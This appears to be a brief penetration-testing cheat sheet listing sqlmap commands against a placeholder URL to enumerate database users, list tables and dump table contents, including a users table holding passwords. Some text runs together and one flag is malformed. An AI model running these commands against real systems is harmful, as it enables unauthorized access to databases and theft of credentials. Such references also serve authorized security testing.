SQLMap
Users
sqlmap -u http://URL/page.php?id=3 --usersPasswords
sqlmap -u http://URL/page.php?id=3 -dump -T usersTables
sqlmap -u http://URL/page.php?id=3 --tables
# Dump Info
sqlmap -u http://URL/page.php?id=3 -D <DATABASE> -T <TABLE> --dumpLast updated
Was this helpful?